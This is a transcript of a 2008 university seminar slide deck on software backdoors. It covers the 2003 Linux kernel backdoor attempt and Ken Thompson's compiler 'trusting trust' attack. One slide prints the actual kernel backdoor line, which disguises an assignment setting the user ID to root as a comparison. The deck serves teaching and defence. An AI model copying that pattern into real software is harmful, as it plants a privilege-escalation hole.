Presentation is loading. Please wait.

Presentation is loading. Please wait.

BACKDOORS in Software Seminar on Software University of Turku January 2008 Eino Malinen.

Published by Modified over 9 years ago

Similar presentations

Presentation on theme: "BACKDOORS in Software Seminar on Software University of Turku January 2008 Eino Malinen."— Presentation transcript:

1 BACKDOORS in Software Seminar on Software Engineering @ University of Turku January 2008 Eino Malinen

2 Definition and Introduction unwanted software mechanism introduced into part of the system to provide an easy access attacker has created the mechanism earlier and wants to use it sometime later mechanism can be injected from outside: malware send through network on-site: hard coded into software two examples of actual backdoors

3 Backdoor Attempt in Linux Kernel happened in November 2003 change in a kernel source file kernel/exit.c person noticing this first focused on the annoyance of using manual modification peers queried more about the change

4 Backdoor Attempt in Linux Kernel following piece of code was added: if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) retval = -EINVAL; effectively this means that with flags __WCLONE and __WALL on current user gets root permissions lax review might think the latter as an evaluation of condition instead of assignment extra parenthesis avoid compile warnings

5 Backdoor Attempt in Linux Kernel the attempt came to daylight because the file in question was under automatic control of modifications fellow developers were active enough to ask about the changes

6 Backdoors in Compilers introduced by Ken Thompson in 1984 prerequisite concepts for compiler backdoor self-replicating program program outputs its own source code also known as quine

7

8 Backdoors in Compilers prerequisite concepts for compiler backdoor self-replicating program program outputs its own source code also known as quine training programs adding new feature to program e.g. to recognize new escaped symbol

9

10

11

12 Backdoors in Compilers phases of injecting backdoor into compiler add backdoor to compiler source code to compile backdoor in login command add another backdoor to compiler source code to insert this as self-replicating code and login backdoor to compiler source code

13

14

15

16 Backdoors in Compilers backdoor was tested on friendly victim disassembler was also rigged to fail the diassembling of object code

17 Sources Jeremy. Linux: Kernel “Back Door” Attempt. http://kerneltrap.org/node/view/1584 Poulsen. Thwarted Linux backdoor hints at smarter hackers. http://www.securityfocus.com/news/7388 Thompson, Reflections on Trusting Trust. Communications of the ACM. Vol. 27, Issue 8 (Aug. 1984), pages 761-763 Skoudis & Zeltser. Malware: Fighting Malicious Code. Schneier. Countering "Trusting Trust". http://www.schneier.com/blog/archives/2006/01/countering_trus.html Zhang & Paxson. Detecting Backdoors. http://www.icir.org/vern/papers/backdoor/index.html

Download ppt "BACKDOORS in Software Seminar on Software University of Turku January 2008 Eino Malinen."

Similar presentations

Trap Doors & Logic Bombs William Dotson. Overview Malware Taxonomy Definitions Historical Overview Protection Methods Ethical Issues.

Trap Doors & Logic Bombs William Dotson. Overview Malware Taxonomy Definitions Historical Overview Protection Methods Ethical Issues.
Understand Database Security Concepts

Understand Database Security Concepts
By Philipp Vogt, Florian Nentwich, Nenad Jovanovic, Engin Kirda, Christopher Kruegel, and Giovanni Vigna Network and Distributed System Security(NDSS ‘07)

By Philipp Vogt, Florian Nentwich, Nenad Jovanovic, Engin Kirda, Christopher Kruegel, and Giovanni Vigna Network and Distributed System Security(NDSS ‘07)
1 Anti Virus vs virus System i-Specific Anti-Virus Product Ali ameen al said.

1 Anti Virus vs virus System i-Specific Anti-Virus Product Ali ameen al said.
Reflections on Trusting Trust Ken Thompson. Communication of the ACM, Vol. 27, No. 8, August 1984, pp. 761-763. Copyright 1984, Association for Computing.

Reflections on Trusting Trust Ken Thompson. Communication of the ACM, Vol. 27, No. 8, August 1984, pp Copyright 1984, Association for Computing.
Dan Boneh CS155 Computer Security Looking for undergrad research? Come see me!

Dan Boneh CS155 Computer Security Looking for undergrad research? Come see me!
Computer Security Dan Boneh and David Mazieres CS 155 Spring 2007

Computer Security Dan Boneh and David Mazieres CS 155 Spring 2007
What are Trojan horses?  A Trojan horse is full of as much trickery as the mythological Trojan horse it was named after. The Trojan horse, at first glance.

What are Trojan horses?  A Trojan horse is full of as much trickery as the mythological Trojan horse it was named after. The Trojan horse, at first glance.
Trusting the Trust Budi Rahardjo Inixindo Security Day Seminar The Executive Club, Jakarta, 19 March 2009.

Trusting the Trust Budi Rahardjo Inixindo Security Day Seminar The Executive Club, Jakarta, 19 March 2009.
Security: Attacks. 2 Trojan Horse Malicious program disguised as an innocent one –Could modify/delete user’s file, send important info to cracker, etc.

Security: Attacks. 2 Trojan Horse Malicious program disguised as an innocent one –Could modify/delete user’s file, send important info to cracker, etc.
Chapter 4 Application Security Knowledge and Test Prep

Chapter 4 Application Security Knowledge and Test Prep
Security Comparisons of Open Source and Closed Source Programs Katherine Wright.

Security Comparisons of Open Source and Closed Source Programs Katherine Wright.
Norman SecureSurf Protect your users when surfing the Internet.

Norman SecureSurf Protect your users when surfing the Internet.
1 Introduction to Tool chains. 2 Tool chain for the Sitara Family (but it is true for other ARM based devices as well) A tool chain is a collection of.

1 Introduction to Tool chains. 2 Tool chain for the Sitara Family (but it is true for other ARM based devices as well) A tool chain is a collection of.
1 Chap 10 Malicious Software. 2 Viruses and ”Malicious Programs ” Computer “Viruses” and related programs have the ability to replicate themselves on.

1 Chap 10 Malicious Software. 2 Viruses and ”Malicious Programs ” Computer “Viruses” and related programs have the ability to replicate themselves on.
Lecture 18 Page 1 CS 111 Online Design Principles for Secure Systems Economy Complete mediation Open design Separation of privileges Least privilege Least.

Lecture 18 Page 1 CS 111 Online Design Principles for Secure Systems Economy Complete mediation Open design Separation of privileges Least privilege Least.
UNIT 4 ASSIGNMENT VIRUSES & DESTRUCTIVE PROGRAMS.

UNIT 4 ASSIGNMENT VIRUSES & DESTRUCTIVE PROGRAMS.
VeribisCRM CUSTOMER RELATIONSHIP MANAGEMENT Engin Duran www.veribis.com.tr Experience is our know how.

VeribisCRM CUSTOMER RELATIONSHIP MANAGEMENT Engin Duran Experience is our know how.
Information Security Rabie A. Ramadan GUC, Cairo Room C7 -310 Lecture 2.

Information Security Rabie A. Ramadan GUC, Cairo Room C Lecture 2.
Home Media Network Hard Drive Training for Update to 2.0 By Erik Collett 6.03.09 Revised for Firmware Update.

Home Media Network Hard Drive Training for Update to 2.0 By Erik Collett Revised for Firmware Update.

Similar presentations

Ads by Google